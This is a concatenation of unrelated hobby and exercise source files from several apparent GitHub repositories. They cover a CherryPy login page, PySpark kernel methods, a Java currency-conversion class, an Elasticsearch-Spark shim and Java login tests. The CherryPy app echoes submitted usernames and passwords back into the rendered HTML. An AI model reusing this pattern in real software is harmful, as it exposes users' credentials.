def page(self):
h1 = header_begin()
h2 = header_end()
page = """
<form action="doLogin" method="post">
<p>Username</p>
<input type="text" name="username" size="15" maxlength="40"/>
<p>Password</p>
<input type="password" name="password" value=""
size="10" maxlength="40"/>
<p><input type="submit" value="Login"/></p>
<p><input type="reset" value="Clear"/></p>
</form>
"""
page = "%s %s %s %s %s" %(h1.printh(),page,self.nom,self.passwd,h2.printh())
return page
<file_sep>import psycopg2,array
conn = psycopg2.connect("user=memoria password=<PASSWORD> host=127.0.0.1 dbname=dbmemoria")
curs = conn.cursor()
curs.execute("""Drop TABLE operations""")
curs.execute("""CREATE TABLE operations (id SERIAL PRIMARY KEY,Nomclient varchar(200),IdClient varchar(200),NomOperation varchar(200),Date varchar(100))""")
#curs.execute("""Drop TABLE adresses""")
curs.execute("""CREATE TABLE adresses (id SERIAL PRIMARY KEY, idoperation varchar(200),colonne1 varchar(200),colonne2 varchar(200),colonne3 varchar(200),colonne4 varchar(200),colonne5 varchar(200),colonne6 varchar(200),colonne7 varchar(200),colonne8 varchar(200),colonne9 varchar(200),colonne10 varchar(200),colonne11 varchar(200),colonne12 varchar(200),colonne13 varchar(200),colonne14 varchar(200),colonne15 varchar(200),colonne16 varchar(200),colonne17 varchar(200),colonne18 varchar(200),colonne19 varchar(200),colonne20 varchar(200))""")
conn.commit()
conn.close()
print "FINIT"<file_sep>from ZODB import FileStorage, DB
import transaction
test = """ storage = FileStorage.FileStorage('test-filestorage.fs')
db = DB(storage)
connection = db.open()
root = connection.root()
root['employees'] = ['Mary', 'Jo', 'Bob']
transaction.commit()
k = root.items()
for l in k :
print l
connection.close()
"""
from persistent import Persistent
class User(Persistent):
pass
storage = FileStorage.FileStorage('test-filestorage.fs')
db = DB(storage)
connection = db.open()
root = connection.root()
newuser = User()
neuser = User()
test = User()
newuser.id = 'amk'
neuser.id = 'ak'
newuser.first_name = 'Andrew'
neuser.first_name = 'Andre'
newuser.last_name = 'Kuchling'
neuser.last_name = 'Kuch'
root[newuser.id] = newuser
root[neuser.id] = neuser
transaction.commit()
print root.items()
test = root['amk']
k = root.items()
for l in k :
print l[1].first_name
print test.first_name
connection.close()
<file_sep>import cherrypy,os
current_dir = os.path.dirname(os.path.abspath(__file__))
settings = {
'/img':{'tools.staticdir.on':True,
'tools.staticdir.dir':r'img'}
}
class header_begin:
    """Produces the opening ``<body>`` tag used when assembling a page."""

    def __init__(self):
        # Fragment returned by printh(); kept as an instance attribute so a
        # caller could, in principle, override it per instance.
        self.header = "<body>"

    def printh(self):
        """Return the stored opening-tag fragment."""
        return self.header
class header_end:
    """Produces the closing ``</body>`` tag used when assembling a page."""

    def __init__(self):
        # Fragment returned by printh().
        self.header = "</body>"

    def printh(self):
        """Return the stored closing-tag fragment."""
        return self.header
class write_page:
    """Holds the static HTML body (a personal "for hire" card) that
    root.page() splices between the <body>/</body> fragments."""
    def __init__(self):
        # Raw HTML fragment, emitted verbatim — do not reformat: it is a
        # runtime string, not markup generated by code.
        self.page = """
<table width=100% height=100%>
<tr width=100% height=100%>
<td width=100% height=100%>
Bussiere<br>
Python Programmer for hire2<br>
web site : <a href="http://www.bussieresama.net">http://www.bussieresama.net</a><br>
<img src="img/bussiere.jpg">
</td>
</tr>
</table>
"""
class root:
    """CherryPy application root.

    Exposes two URL handlers: index (renders the page) and doLogin (stores
    the submitted credentials on the instance, then re-renders the page).
    """
    def __init__(self):
        pass
    # Class-level defaults; shadowed by instance attributes once doLogin runs.
    nom = ""
    passwd = ""
    def doLogin(self, username=None, password=None):
        # NOTE(review): credentials are kept in plain text and echoed back
        # into the rendered page by page() below.
        self.nom = username
        self.passwd = password
        return self.page()
    def index(self, username=None, password=None):
        # Parameters are accepted but unused; always renders the page.
        return self.page()
    # CherryPy exposure flags: only handlers marked .exposed are URL-reachable.
    index.exposed = True
    doLogin.exposed = True
    def page(self):
        # Assemble: <body> + static HTML card + last submitted credentials + </body>.
        # header_begin/header_end/write_page are defined earlier in this file.
        h1 = header_begin()
        h2 = header_end()
        pagewrite = write_page()
        page = pagewrite.page
        page = "%s %s %s %s %s" % (h1.printh(), page, self.nom, self.passwd, h2.printh())
        return page
# Server bootstrap: anchor the static-file root at this file's directory
# (used by the /img staticdir mapping in 'settings'), switch to production
# defaults but keep console logging, pick the port, and start the app.
cherrypy.config.update({'tools.staticdir.root': r'%s' % current_dir})
cherrypy.config.update({'environment': 'production', 'log.screen': True})
# NOTE(review): port 664 is privileged (<1024) on Unix — requires elevated rights.
cherrypy.config.update({'server.socket_port': 664})
cherrypy.quickstart(root(), config=settings)
<file_sep>import cherrypy
class Config:
    """Supplies the CherryPy configuration mapping for the application."""

    def getConfig(self):
        """Return the global server settings (listen on port 80)."""
        return {
            'global': {
                'server.socket_port': 80,
            },
        }
<file_sep>import serial,threading,time #importe le module serial pour communiquer avec la voie serie
# Serial-port monitor script (Python 2 only — uses print statements).
serhdl = serial.Serial(0)  # open the first serial port (COM1)
serhdl.open()

class T(threading.Thread):
    """Background reader: blocks on the serial port and prints each received byte."""
    def __init__(self):
        threading.Thread.__init__(self)
        # Consecutive-read counter, intended to reset on an "empty" read.
        self.a = 0
    def run(self):
        while(True):
            # Blocking one-byte read, converted to its integer code.
            output = ord(serhdl.read())
            # NOTE(review): 'output' is an int, so the comparison with "" is
            # always true — the counter is incremented forever and never reset.
            if (output != ""):
                self.a += 1
            else:
                self.a = 0
            # French diagnostics: value as number, modulo 43, counter, character.
            print "valeur lue chiffre", output
            print "valeur lue chiffre \"modulo 43\" : ", output % 43
            print "compteur", self.a
            print "valeur lue car", chr(output)
            print "\n"

# Start the reader; no join/stop — the daemonless thread runs until killed.
t = T()
t.start()
<file_sep>[Picasa]
name=bledsheim
description=
date=38211.787465
category=My Albums
| 5ed1aeead368945454b595dfc71ca5e027112719 | [
"Python",
"INI"
] | 9 | Python | bussiere/bussierelab | 07fdf05ddbf3395ec471dd150d887b74c667aadd | 446c41f42291b67290301a185c3ca74e424b90a3 |
refs/heads/master | <file_sep>from setuptools import setup
setup(name='ApplyKernel',
version='0.1',
description='A Phyton (PySpark) Package to extend linear mllib regression models to process non-linear data using Kernels.',
url='https://github.com/heikowagner/ApplyKernel',
author='<NAME>',
author_email='<EMAIL>',
license='Apache 2.0',
packages=['ApplyKernel'],
zip_safe=False)<file_sep># ApplyKernel
A Python (PySpark) Package to extend linear mllib regression models to process non-linear data using Kernels.
Install the package via:
```
pip install git+https://github.com/heikowagner/ApplyKernel.git
```
# Theoretical Insights
The theoretical foundation for the kernel method can be found at https://www.thebigdatablog.com/non-linear-support-vector-machines-svm-in-spark/ implementation details at https://www.thebigdatablog.com/non-linear-classification-methods-in-spark/.
# Usage
To train a model:
`TrainedModel= ApplyKernel(<Model>, <Kernel>, <Bandwidth>).train(<LabeledPointVector>)`.
For prediction:
`TrainedModel.predict(<FeatureVector>)`.
## Example:
```python
from ApplyKernel import ApplyKernel, RadialKernel
import numpy as np
import matplotlib.pyplot as plt
##Generate data
#Simulation
N=500
Y= np.random.randint(0,2,N)
degree=np.random.normal(0,1,N)*2*np.pi
X= [0+ (0.5 + Y*0.5)* np.cos(degree)+ np.random.normal(0,2,N)*0.05, 0 + (0.5 + Y*0.5)*np.sin(degree)+ np.random.normal(0,2,N)*0.05 ]
#plot data
plt.scatter(X[0], X[1], c=Y)
plt.show()
#Create LabeledPoint Vector
from pyspark.mllib.regression import LabeledPoint
X_par=sc.parallelize(np.transpose(X)).zipWithIndex().map(lambda(x,y) : (y,x) )
Y_par=sc.parallelize(np.transpose(Y)).zipWithIndex().map(lambda(x,y) : (y,x) )
Y_X= Y_par.join(X_par).map(lambda(y,x) : LabeledPoint(x[0], x[1]) )
from pyspark.mllib.regression import LinearRegressionModel, LinearRegressionWithSGD
from pyspark.mllib.classification import LogisticRegressionWithLBFGS, LogisticRegressionModel
from pyspark.mllib.classification import SVMModel, SVMWithSGD
##Train the Models
#KernelRegression= ApplyKernel(LinearRegressionWithSGD, RadialKernel, 0.5).train(Y_X)
#KernelLogit= ApplyKernel(LogisticRegressionWithLBFGS, RadialKernel, 0.5).train(Y_X)
KernelSVM= ApplyKernel(SVMWithSGD, RadialKernel, 0.5).train(Y_X)
##Simulate Test Set
N=200
Y_test= np.array( np.random.randint(0,2,N) )
degree=np.random.normal(0,1,N)*2*np.pi
X_test= np.array( [0+ (0.5 + Y_test*0.5)* np.cos(degree)+ np.random.normal(0,2,N)*0.05, 0 + (0.5 + Y_test*0.5)*np.sin(degree)+ np.random.normal(0,2,N)*0.05 ])
X_par= sc.parallelize( X_test.transpose() )
##Predict Group
Preds = KernelSVM.predict(X_par)
##Evaluate Model
sc_Y=sc.parallelize( Y_test ).zipWithIndex().map(lambda (x,y): (y,x))
labelsAndPreds=Preds.zipWithIndex().map(lambda (x,y): (y,x)).join( sc_Y ).map(lambda (x,y): y)
testErr = labelsAndPreds.filter(lambda (x,y): y != x).count() / float(labelsAndPreds.count())
print("Training Error = " + str(testErr))
plt.scatter(X_test[0], X_test[1], c=Preds.collect() )
plt.show()
```
<file_sep>from pyspark.mllib.regression import LabeledPoint
import numpy as np
def RadialKernel(x, y, sigma):
    """Gaussian (RBF) kernel: exp(-||x - y||^2 / (2 * sigma^2)).

    x, y  -- numeric vectors of equal length supporting elementwise '-' and
             '**' (e.g. numpy arrays).
    sigma -- kernel bandwidth.
    """
    squared_distance = sum((x - y) ** 2)
    return np.exp(-squared_distance / (2 * sigma ** 2))
def construct_K(Y_X, lamb, kernel, X_1=None):
    """Build the kernel (Gram) matrix rows between X_1 and the training features.

    Y_X    -- RDD of LabeledPoint training data.
    lamb   -- kernel bandwidth, forwarded as the kernel's third argument.
    kernel -- callable kernel(x, y, lamb) -> float.
    X_1    -- optional RDD of raw feature vectors; defaults to the training
              features themselves (square training Gram matrix).
    Returns [sp_Y, K]: sp_Y is an (index, label) RDD; K is an
    (X_1-row-index, kernel value) RDD over the cartesian grid.
    NOTE: uses Python 2 tuple-parameter lambdas — Python 2 only.
    """
    # Training feature vectors with an attached row index for later regrouping.
    sp_X = Y_X.map(lambda x: x.features.toArray()).zipWithIndex()
    if X_1 != None:
        sp_X_1 = X_1.zipWithIndex()
    else:
        sp_X_1 = sp_X
    # Labels keyed by their row index.
    sp_Y = Y_X.map(lambda x: x.label).zipWithIndex().map(lambda(x, y): (y, x))
    # Every (X_1 row) x (training row) pair; keep the X_1 row index as the key.
    grid = sp_X_1.cartesian(sp_X)
    K = grid.map(lambda(x, y): (x[1], kernel(x[0], y[0], lamb)))
    return [sp_Y, K]
def construct_labeled(Y, K):
    """Regroup per-pair kernel values into one LabeledPoint per row.

    Y -- (index, label) RDD; K -- (index, kernel value) RDD.
    Returns [labeled, order]: 'labeled' is an RDD of
    LabeledPoint(label, kernel-row); 'order' holds the original row indices,
    since reduceByKey may reorder rows.
    Python 2 only (tuple-parameter lambdas).
    """
    def add_element(acc, x):
        # Fold step: every pair for a given index carries the same label, so
        # min() simply keeps it; kernel values are accumulated into a list
        # (acc[1] is a bare value on the first merge, a list afterwards).
        if type(acc[1]) == list:
            return (min(acc[0], x[0]), acc[1] + [x[1]])
        else:
            return (min(acc[0], x[0]), [acc[1]] + [x[1]])
    # join yields (index, (label, kval)); fold the pairs per index.
    jnd = Y.join(K).reduceByKey(lambda acc, x: add_element(acc, x)).cache()
    labeled = jnd.map(lambda(y, x): LabeledPoint(x[0], x[1]))
    order = jnd.map(lambda (y, x): y)
    jnd.unpersist()
    return [labeled, order]
class ApplyKernel:
    """Wraps a linear MLlib trainer so it fits and predicts in kernel space.

    method -- an MLlib algorithm exposing .train / producing a model with
              .predict (e.g. SVMWithSGD, LogisticRegressionWithLBFGS).
    kernel -- callable kernel(x, y, lambd) -> float.
    lambd  -- kernel bandwidth.
    Python 2 only (tuple-parameter lambdas in predict()).
    """
    def __init__(self, method, kernel, lambd):
        self.method = method
        self.lambd = lambd
        self.trained = None    # fitted MLlib model, set by train()
        self.Y_X_dat = None    # cached training data, reused at predict time
        self.kernel = kernel
    def train(self, data, **kwargs):
        """Fit on a LabeledPoint RDD after mapping features through the kernel.

        Returns self so calls can be chained. Extra kwargs are forwarded to
        the underlying trainer.
        """
        data_K = construct_K(data, self.lambd, self.kernel)
        # Keep the raw training set: predict() needs it to build kernel rows.
        self.Y_X_dat = data.cache()
        new_data = construct_labeled(data_K[0], data_K[1])
        self.trained = self.method.train(new_data[0], **kwargs)
        return self
    def predict(self, data, **kwargs):
        """Predict for an RDD of raw feature vectors, preserving input order."""
        # Kernel values of the new points against the cached training set.
        data_K = construct_K(self.Y_X_dat, self.lambd, self.kernel, data)
        l_dat = construct_labeled(data_K[0], data_K[1])
        pred = self.trained.predict(l_dat[0].map(lambda p: p.features.toArray()), **kwargs)
        # Reattach original indices and sort so predictions line up with the input.
        return l_dat[1].zip(pred).sortByKey().map(lambda (x, y): y)
| 56c31b589009b8d287e10170688ef75fa7c60ed3 | [
"Markdown",
"Python"
] | 3 | Python | heikowagner/ApplyKernel | e6f3410972145e7eee1fdce49e1961081dec4836 | bebc3458fec3c7458006175e450e0b5aefaaccc6 |
refs/heads/master | <file_sep>(function () {
"use strict";
this.console.log("...");
}).apply(this); | 561fa40d9980c71dfa05f8d5b19b9a7a4cd31c4d | [
"JavaScript"
] | 1 | JavaScript | sentenzo/adAstra | 5ee048d55fc0daf8e5fee3107dd46c03fae539ff | caf3cebfcd8173e46b64cd5cb68bc0eccd16fdba |
refs/heads/master | <file_sep>/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package atividade1;
/**
*
* @author <NAME> 12.02643-3
* @author <NAME> 12.01595-4
*/
/**
 * A money amount tagged with a currency ("real", "euro" or "dolar"),
 * plus shared (static) exchange rates and conversion helpers.
 */
public class Dinheiro {
    // attributes
    private double valor;   // amount, expressed in the currency named by 'moeda'
    private String moeda;   // one of "real", "euro", "dolar"
    // Shared exchange rates, mutable via alterarTaxa*().
    // NOTE(review): used as euro = dollar * taxaEuroDolar and
    // real = dollar * taxaRealDolar (see dolarParaEuro/dolarParaReal below) —
    // confirm this is the intended direction of each rate.
    public static double taxaEuroDolar = 0.9249;
    public static double taxaRealDolar = 3.08;
    // setters
    /**
     * Changes the currency tag if it is one of the three supported names.
     * NOTE(review): private and never called inside this class; it also does
     * not convert 'valor', so the amount keeps its old currency's magnitude.
     */
    private boolean setMoeda(String M) {
        if (M.equals("real") || M.equals("euro") || M.equals("dolar")) {
            this.moeda = M;
            System.out.println("Moeda alterada com sucesso");
            return true;
        }
        return false;
    }
    /** Replaces the shared real/dollar rate for all Dinheiro instances. */
    public static boolean alterarTaxaRealDolar(double t) {
        Dinheiro.taxaRealDolar = t;
        return true;
    }
    /** Replaces the shared euro/dollar rate for all Dinheiro instances. */
    public static boolean alterarTaxaEuroDolar(double t) {
        Dinheiro.taxaEuroDolar = t;
        return true;
    }
    /**
     * Sets the amount. The input 'v' is always interpreted as a value in reais
     * and is converted into this object's currency before being stored.
     */
    public boolean setValor(double v){
        if(this.moeda.equals("real")){
            this.valor = v;
        }
        else{
            if (this.moeda.equals("dolar")){
                this.valor = this.realParaDolar(v);
            }
            else {
                this.valor = this.realParaEuro(v);
            }
        }
        return true;
    }
    // Constructor: 'v' is taken verbatim as an amount already expressed in currency 'm'.
    public Dinheiro(double v, String m){
        this.valor = v;
        this.moeda = m;
    }
    // getters
    public double getTaxaRealDolar() {
        return Dinheiro.taxaRealDolar;
    }
    public double getTaxaEuroDolar() {
        return Dinheiro.taxaEuroDolar;
    }
    public String getMoeda() {
        return this.moeda;
    }
    /** Returns the amount converted to reais (see valorEmReal()). */
    public double getValor(){
        return this.valorEmReal();
    }
    // conversion helpers — all use the shared static rates
    public static double realParaDolar(double r){
        return r/Dinheiro.taxaRealDolar;
    }
    public static double dolarParaReal(double d){
        return d*Dinheiro.taxaRealDolar;
    }
    public static double euroParaDolar(double e){
        return e/Dinheiro.taxaEuroDolar;
    }
    public static double dolarParaEuro(double d){
        return d*Dinheiro.taxaEuroDolar;
    }
    // euro <-> real conversions pivot through the dollar.
    public static double euroParaReal(double e){
        return Dinheiro.dolarParaReal(Dinheiro.euroParaDolar(e));
    }
    public static double realParaEuro(double r){
        return Dinheiro.dolarParaEuro(Dinheiro.realParaDolar(r));
    }
    /** The stored amount expressed in reais, whatever 'moeda' currently is. */
    private double valorEmReal(){
        if(this.moeda.equals("real")){
            return this.valor;
        }
        else{
            if (this.moeda.equals("dolar")){
                return this.dolarParaReal(this.valor);
            }
            else {
                return this.euroParaReal(this.valor);
            }
        }
    }
    /** The stored amount in dollars. NOTE(review): never called from this class. */
    private double valorEmDolar(){
        if(this.moeda.equals("dolar")){
            return this.valor;
        }
        else{
            if (this.moeda.equals("real")){
                return this.realParaDolar(this.valor);
            }
            else {
                return this.euroParaDolar(this.valor);
            }
        }
    }
    /** The stored amount in euros. NOTE(review): never called from this class. */
    private double valorEmEuro(){
        if(this.moeda.equals("euro")){
            return this.valor;
        }
        else{
            if (this.moeda.equals("dolar")){
                return this.dolarParaEuro(this.valor);
            }
            else {
                return this.realParaEuro(this.valor);
            }
        }
    }
}
<file_sep># HelloWorld
teste da aula
<file_sep>/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package atividade1;
/**
*
* @author <NAME> 12.02643-3
* @author <NAME> 12.01595-4
*/
/**
 * Demo driver: builds four Conta accounts (Conta is defined elsewhere in the
 * project), runs a sequence of transfers and a withdrawal across mixed
 * currencies, and prints each account's state along the way.
 */
public class Atividade1 {
    /**
     * @param args the command line arguments (unused)
     */
    public static void main(String[] args) {
        // Accounts in three currencies ("real", "dolar", "euro").
        // NOTE(review): the meaning of the two numeric constructor arguments
        // (balance vs. limit?) is not visible here — confirm against Conta.
        Conta c1 = new Conta("111","111.111-11","Amilton","Dias","04385745602",1000,250,"real");
        Conta c2 = new Conta("222","222.222-22","Henrique","Diniz","04385745456",3000,1000,"dolar");
        Conta c3 = new Conta("333","333.333-33","Leonardo","Nomo","34585745456",200,12000,"euro");
        Conta c4 = new Conta("444","444.444-44","Alberto","Roberto","04385723456",1800,0,"real");
        // Cross-currency transfers out of the dollar account.
        c2.transferirPara(c1, 700);
        c2.transferirPara(c3, 2000);
        c1.exibirTodasInformacoesDaConta();
        c2.exibirTodasInformacoesDaConta();
        c3.exibirTodasInformacoesDaConta();
        // Withdrawal plus a transfer from the same account.
        c1.sacar(1800);
        c1.transferirPara(c4, 200);
        c1.exibirTodasInformacoesDaConta();
        c4.exibirTodasInformacoesDaConta();
        // Transfers out of the euro account (10000 likely exceeds its funds —
        // behavior depends on Conta's overdraft rules).
        c3.transferirPara(c4, 10000);
        c3.transferirPara(c2, 1000);
        c2.exibirTodasInformacoesDaConta();
        c4.exibirTodasInformacoesDaConta();
    }
}
| 64cda8f1d88751d941f594f42b0fb42e35233c32 | [
"Markdown",
"Java"
] | 3 | Java | FeTPiva/HelloWorld | 9b466c37dd66c41cda67026c97b2955ceaca4853 | 02c26e1f3ff4e26d48e9d280ea94034856c93296 |
refs/heads/master | <file_sep>package org.elasticsearch.spark.rdd;
import java.lang.reflect.Field;
import org.apache.commons.logging.Log;
import org.apache.spark.SparkConf;
import org.apache.spark.TaskContext;
import org.apache.spark.util.TaskCompletionListener;
import org.elasticsearch.hadoop.util.ObjectUtils;
import org.elasticsearch.hadoop.util.ReflectionUtils;
import scala.Function0;
import scala.runtime.AbstractFunction0;
import scala.runtime.BoxedUnit;
/**
 * Reflection-based shim that lets this connector run against both the
 * Spark 1.0 and Spark 1.1+ TaskContext APIs (completion callbacks and the
 * task-interrupted flag), and warns when a Spark SQL SchemaRDD is saved
 * through the schema-unaware plain-RDD path.
 */
abstract class CompatUtils {
    // True when the Spark 1.1+ TaskCompletionListener class is on the classpath.
    private static final boolean SPARK_11_AVAILABLE = ObjectUtils.isClassPresent("org.apache.spark.util.TaskCompletionListener", SparkConf.class.getClassLoader());
    //public static final boolean SPARK_12_AVAILABLE = ObjectUtils.isClassPresent("org.apache.spark.sql.catalyst.types.BinaryType", SparkConf.class.getClassLoader());
    // Loaded reflectively because the Spark SQL module may be absent at runtime.
    private static final Class<?> SCHEMA_RDD_LIKE_CLASS;
    static {
        Class<?> clz = null;
        try {
            clz = Class.forName("org.apache.spark.sql.SchemaRDDLike", false, CompatUtils.class.getClassLoader());
        } catch (Exception ex) {
            // ignore: Spark SQL not present — the SchemaRDD warning is simply disabled
        }
        SCHEMA_RDD_LIKE_CLASS = clz;
    }
    /** Spark 1.0.x path: old callback API + reflective access to the non-public 'interrupted' field. */
    private static abstract class Spark10TaskContext {
        private static Field INTERRUPTED_FIELD;
        static {
            Field field = ReflectionUtils.findField(TaskContext.class, "interrupted");
            ReflectionUtils.makeAccessible(field);
            INTERRUPTED_FIELD = field;
        }
        static void addOnCompletition(TaskContext taskContext, final Function0<?> function) {
            // Adapt the Scala Function0 to the pre-1.1 addOnCompleteCallback signature.
            taskContext.addOnCompleteCallback(new AbstractFunction0() {
                @Override
                public BoxedUnit apply() {
                    function.apply();
                    return BoxedUnit.UNIT;
                }
            });
        }
        static boolean isInterrupted(TaskContext taskContext) {
            return ReflectionUtils.getField(INTERRUPTED_FIELD, taskContext);
        }
    }
    /** Spark 1.1+ path: uses the public TaskCompletionListener / isInterrupted() API. */
    private static abstract class Spark11TaskContext {
        static void addOnCompletition(TaskContext taskContext, final Function0<?> function) {
            taskContext.addTaskCompletionListener(new TaskCompletionListener() {
                @Override
                public void onTaskCompletion(TaskContext context) {
                    function.apply();
                }
            });
        }
        static boolean isInterrupted(TaskContext taskContext) {
            return taskContext.isInterrupted();
        }
    }
    /** Registers 'function' to run at task completion, picking the API available at runtime. */
    static void addOnCompletition(TaskContext taskContext, Function0<?> function) {
        if (SPARK_11_AVAILABLE) {
            Spark11TaskContext.addOnCompletition(taskContext, function);
        }
        else {
            Spark10TaskContext.addOnCompletition(taskContext, function);
        }
    }
    /** Whether the running task has been cancelled, via whichever API is available. */
    static boolean isInterrupted(TaskContext taskContext) {
        return (SPARK_11_AVAILABLE ? Spark11TaskContext.isInterrupted(taskContext) : Spark10TaskContext.isInterrupted(taskContext));
    }
    /** Logs a warning when a SchemaRDD is saved via the schema-unaware RDD API. */
    static void warnSchemaRDD(Object rdd, Log log) {
        if (rdd != null && SCHEMA_RDD_LIKE_CLASS != null) {
            if (SCHEMA_RDD_LIKE_CLASS.isAssignableFrom(rdd.getClass())) {
                log.warn("basic RDD saveToEs() called on a Spark SQL SchemaRDD; typically this is a mistake(as the SQL schema will be ignored). Use 'org.elasticsearch.spark.sql' package instead");
            }
        }
    }
} | 68869832fcf6141f93f930118b2f14dceb0a2297 | [
"Java"
] | 1 | Java | Gavin-Yang/elasticsearch-hadoop | e0aabd9d754e010e710e645340c0fae9020208e0 | fd8427dba6a9b5418c2f2a93c37b212326b5c4f6 |
refs/heads/master | <file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.webapp.controllers;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Client;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.ClientService;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.impl.ClientServiceImpl;
import javax.servlet.ServletException;
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
/**
 * Login page controller: GET renders the form, POST checks the submitted
 * credentials and either starts a session or re-renders the form with an error.
 */
public class LoginController extends AbstractController {
    /** Shows the login form (login.ftl). */
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        req.getRequestDispatcher("login.ftl").forward(req, resp);
    }
    /** Authenticates the posted login/password pair. */
    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        ClientService clientService = new ClientServiceImpl();
        String login = req.getParameter("login");
        String password = req.getParameter("password");
        // Credential checking is delegated to the service layer; null means no match.
        Client client = clientService.find(login, password);
        if (client != null) {
            // Mark the session as authenticated and go to the home page.
            req.getSession().setAttribute("login", login);
            resp.sendRedirect("/home");
        } else {
            // Russian: "Invalid login or password" — shown back on the form.
            String error = "Неверный логин или пароль";
            req.setAttribute("error", error);
            req.getRequestDispatcher("login.ftl").forward(req, resp);
        }
    }
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service;
import org.junit.Test;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.CategoryDao;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.ClientDao;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.RecordDao;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Category;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Client;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Coordinate;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Record;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.enums.Type;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.impl.RecordServiceImpl;
import java.sql.Date;
import java.util.HashMap;
import java.util.LinkedList;
import java.util.List;
import java.util.Map;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertTrue;
import static org.mockito.Matchers.anyString;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.when;
/**
 * Unit tests for RecordServiceImpl. Each test wires Mockito mocks of the DAO
 * layer (RecordDao / ClientDao / CategoryDao) into the service via its
 * setters, then checks that the service resolves the client's login to an id
 * and delegates to the corresponding DAO call, returning its result unchanged.
 */
public class RecordServiceImplTest {
    // create() forwards the record to RecordDao.add and returns the new id.
    @Test
    public void testCreate() {
        Record record = new Record(0L, 0L, 0L, Type.INCOME, 100, "description", Date.valueOf("2016-01-01"));
        RecordDao recordDao = mock(RecordDao.class);
        when(recordDao.add(record)).thenReturn(0L);
        RecordService recordService = new RecordServiceImpl();
        ((RecordServiceImpl) recordService).setRecordDao(recordDao);
        assertEquals(0L, recordService.create(record));
    }
    // get(login) resolves the client id, then returns RecordDao.getAll(id).
    @Test
    public void testGetByClientLogin() {
        List<Record> records = new LinkedList<>();
        records.add(new Record(0L, 0L, 0L, Type.INCOME, 100, "description", Date.valueOf("2016-01-01")));
        Client client = mock(Client.class);
        when(client.getId()).thenReturn(0L);
        ClientDao clientDao = mock(ClientDao.class);
        when(clientDao.get(anyString())).thenReturn(client);
        CategoryDao categoryDao = mock(CategoryDao.class);
        List<Category> categories = new LinkedList<>();
        categories.add(new Category(0L, "category0"));
        categories.add(new Category(1L, "category1"));
        when(categoryDao.get(0L)).thenReturn(categories.get(0));
        when(categoryDao.get(1L)).thenReturn(categories.get(1));
        RecordDao recordDao = mock(RecordDao.class);
        when(recordDao.getAll(0L)).thenReturn(records);
        RecordService recordService = new RecordServiceImpl();
        ((RecordServiceImpl) recordService).setRecordDao(recordDao);
        ((RecordServiceImpl) recordService).setCategoryDao(categoryDao);
        ((RecordServiceImpl) recordService).setClientDao(clientDao);
        assertEquals(records, recordService.get(anyString()));
    }
    // getBalance(login) delegates to RecordDao.getCurrentBalance(clientId).
    @Test
    public void testGetBalance() {
        Client client = mock(Client.class);
        when(client.getId()).thenReturn(0L);
        ClientDao clientDao = mock(ClientDao.class);
        when(clientDao.get(anyString())).thenReturn(client);
        RecordDao recordDao = mock(RecordDao.class);
        when(recordDao.getCurrentBalance(0L)).thenReturn(0L);
        RecordService recordService = new RecordServiceImpl();
        ((RecordServiceImpl) recordService).setRecordDao(recordDao);
        ((RecordServiceImpl) recordService).setClientDao(clientDao);
        assertEquals(0L, recordService.getBalance(anyString()).longValue());
    }
    // getMonthlyIncome(login, month) delegates to RecordDao.getMonthlyIncome.
    @Test
    public void testGetMonthlyIncome() {
        Client client = mock(Client.class);
        when(client.getId()).thenReturn(0L);
        ClientDao clientDao = mock(ClientDao.class);
        when(clientDao.get(anyString())).thenReturn(client);
        RecordDao recordDao = mock(RecordDao.class);
        when(recordDao.getMonthlyIncome(0L, 1)).thenReturn(0L);
        RecordService recordService = new RecordServiceImpl();
        ((RecordServiceImpl) recordService).setRecordDao(recordDao);
        ((RecordServiceImpl) recordService).setClientDao(clientDao);
        assertEquals(0L, recordService.getMonthlyIncome(anyString(), 1).longValue());
    }
    // getIncomeList(login) returns RecordDao.getIncomeList(clientId) unchanged.
    @Test
    public void testGetIncomeList() {
        List<Record> records = new LinkedList<>();
        records.add(new Record(0L, 0L, 0L, Type.INCOME, 100, "description", Date.valueOf("2016-01-01")));
        Client client = mock(Client.class);
        when(client.getId()).thenReturn(0L);
        ClientDao clientDao = mock(ClientDao.class);
        when(clientDao.get(anyString())).thenReturn(client);
        CategoryDao categoryDao = mock(CategoryDao.class);
        List<Category> categories = new LinkedList<>();
        categories.add(new Category(0L, "category0"));
        categories.add(new Category(1L, "category1"));
        when(categoryDao.get(0L)).thenReturn(categories.get(0));
        when(categoryDao.get(1L)).thenReturn(categories.get(1));
        RecordDao recordDao = mock(RecordDao.class);
        when(recordDao.getIncomeList(0L)).thenReturn(records);
        RecordService recordService = new RecordServiceImpl();
        ((RecordServiceImpl) recordService).setRecordDao(recordDao);
        ((RecordServiceImpl) recordService).setCategoryDao(categoryDao);
        ((RecordServiceImpl) recordService).setClientDao(clientDao);
        assertEquals(records, recordService.getIncomeList(anyString()));
    }
    // getExpenditureList(login) returns RecordDao.getExpenditureList(clientId).
    @Test
    public void testGetExpenditureList() {
        List<Record> records = new LinkedList<>();
        records.add(new Record(0L, 1L, 0L, Type.EXPENDITURE, 100, "description", Date.valueOf("2016-01-01")));
